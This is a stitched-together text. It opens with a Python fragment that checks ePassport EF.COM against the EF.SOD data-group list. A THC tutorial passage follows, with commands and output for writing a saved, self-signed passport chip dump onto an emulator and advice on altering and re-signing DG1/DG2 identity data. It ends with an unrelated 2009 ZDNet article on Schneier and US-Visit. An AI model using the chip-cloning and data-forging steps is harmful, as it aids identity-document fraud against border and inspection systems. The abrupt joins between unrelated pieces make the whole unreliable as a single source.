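            out["dgs"] = [DG_TAGS[b] for b in v if b in DG_TAGS]
    return out

def com_sod_mismatch(ef_com, sod_dgs):
    """DGs hashed in the signed SOD but missing from EF.COM, and DGs announced in
    EF.COM that the SOD does not cover; a correct inspection system rejects both."""
    com, sod = set(parse_ef_com(ef_com)["dgs"]), set(sod_dgs)
    return {"missing_from_com": sorted(sod - com), "unsigned_in_com": sorted(com - sod)}

# Constructed EF.COM (LDS 1.7, Unicode 4.0.0) announcing DG1, DG2 and DG15, and the
# same file with the DG15 tag (0x6F) removed. SOD_DGS stands in for the hash list a
# real inspection system reads from the LDSSecurityObject inside EF.SOD.
SAMPLE_COM = bytes.fromhex("6015 5F0104 30313037 5F3606 303430303030 5C03 61756F")
STRIPPED_COM = bytes.fromhex("6014 5F0104 30313037 5F3606 303430303030 5C02 6175")
SOD_DGS = [1, 2, 15]
```

Run against `STRIPPED_COM`, the check reports DG15 as hashed by the issuer but absent from the index, which is exactly the condition a reader driving only from EF.COM never notices.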


(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country :-D

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning ;) 

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

vonJeek's passport

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerely,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org


BT chief security-technology officer Bruce Schneier slams US border biometrics

Jul 23rd, 2009 | By Innovya | Category: Evidence, News, Opinions

By Tom Espiner ZDNet.co.uk

Posted on ZDNet News

Security expert and BT chief security-technology officer Bruce Schneier has attacked the US-Visit border-biometrics program, saying it has had “zero benefit” in terms of security.

Speaking to ZDNet UK last week, Schneier said that there was little evidence that the US-Visit program, which takes fingerprints and retinal scans from all visitors to the United States, had made any impact on reducing the threat from criminals and terrorists.

“If the Department of Homeland Security had apprehended any terrorists [through US-Visit], they would have kicked up a huge press stink,” said Schneier. “There has been zero benefit from the program.”

A long-time critic of the US-Visit program, Schneier first questioned the cost-effectiveness of the scheme in 2006. At the time, just under 1,000 people had been apprehended for criminal or immigration violations, yet the program had cost $15 billion (£9.4bn) up to that point.

“Take that $15 billion number,” wrote Schneier in a 2006 blog post. “One thousand bad guys, most of them not very bad, caught through US-Visit. That’s $15 million per bad guy caught. Surely there’s a more cost-effective way to catch bad guys?”

However, Robert Jamison, undersecretary at the US Department of Homeland Security’s National Protection and Programs Directorate, which oversees US-Visit, told ZDNet UK at the RSA Conference Europe 2008 on Wednesday that the border-biometrics program had been effective.

“There have been several instances of someone applying for entry under one name, being denied, applying under another name, and again being denied [due to biometrics records],” said Jamison. “In a few cases, criminal activity and, in some cases, terrorist activity have been prevented.”

Jamison declined to say exactly how many terrorists had been caught as a direct result of the program, saying the information was “classified”. However, Department of Homeland Security figures show that more than 2,400 immigration “violators” and criminals have been identified since the inception of the program in January 2004.

In February, US-Visit was claimed to have helped identify two terrorist suspects, now being held in Iraq, from fingerprints lifted from an improvised explosive device.